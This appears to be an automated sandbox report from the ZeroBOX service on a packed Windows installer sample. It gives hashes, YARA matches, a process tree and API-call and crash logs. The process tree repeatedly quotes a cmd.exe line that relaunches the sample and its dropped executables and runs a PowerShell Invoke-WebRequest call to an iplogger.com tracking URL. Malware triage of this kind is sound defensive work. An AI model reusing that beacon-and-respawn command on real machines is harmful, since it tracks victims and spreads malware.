Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 10, 2024, 10:55 a.m.	Oct. 10, 2024, 11:03 a.m.

Size	4.4MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`16d6121d4ff8ab1f1a6ae47a096220d3`
SHA256	`a96c1c6be687e8ac8e7e6c03760b4ce7ec91f80e5141766179b839cb970a958a`
CRC32	`1A5FDCAA`
ssdeep	`98304:OX49DakkJ/4Q+8Ceevz8cCDnAByc560G0AxO9+BxUtz:vVC/hze7EABr60Uk+BGt`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

QkZoHEBKmB.exe "C:\Users\test22\AppData\Local\Temp\QkZoHEBKmB.exe"
2552
- cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
  2640
  - 1.exe "1.exe"
    2704
  - 2.exe "2.exe"
    2812
  - QkZoHEBKmB.exe "QkZoHEBKmB.exe"
    2888
    - cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
      2992
      - 1.exe "1.exe"
        1216
      - 2.exe "2.exe"
        2108
      - QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2192
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2504
        
        1.exe "1.exe"
        2656
        
        2.exe "2.exe"
        2624
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2380
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        1356
        
        1.exe "1.exe"
        2256
        
        2.exe "2.exe"
        2724
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2780
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2412
        
        1.exe "1.exe"
        2952
        
        2.exe "2.exe"
        2872
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2564
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2892
        
        1.exe "1.exe"
        2224
        
        2.exe "2.exe"
        2056
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2084
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3052
        
        1.exe "1.exe"
        1964
        
        2.exe "2.exe"
        2828
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2748
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2932
        
        1.exe "1.exe"
        884
        
        2.exe "2.exe"
        2568
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        2908
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2536
        
        1.exe "1.exe"
        284
        
        2.exe "2.exe"
        3104
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        3208
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3536
        
        1.exe "1.exe"
        3596
        
        2.exe "2.exe"
        3688
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        3832
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3908
        
        1.exe "1.exe"
        4008
        
        2.exe "2.exe"
        828
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        3340
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3608
        
        1.exe "1.exe"
        3680
        
        2.exe "2.exe"
        1256
        
        QkZoHEBKmB.exe "QkZoHEBKmB.exe"
        4048
        
        cmd.exe "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3272
        
        1.exe "1.exe"
        1088
        
        2.exe "2.exe"
        344
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2184
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3852
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3964
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3468
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        1892
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        676
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2520
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2804
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2308
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        3024
      - powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        2360
  - powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
    2968

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 66 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 10, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (11 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:55 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:56 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:56 a.m.			0	0
IsDebuggerPresent Oct. 10, 2024, 10:57 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 504 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004302c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004303c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042fe80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042fe80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042fe80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ffc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00430c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00530928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00531328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00531328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 10, 2024, 10:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00531328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 10, 2024, 10:55 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

One or more processes crashed (26 events)

Time & API	Arguments	Status
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 1677393920	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 1833041920	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2418278400	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2525757440	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2637168640	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2198601728	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2267217920	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2387214336	1
__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
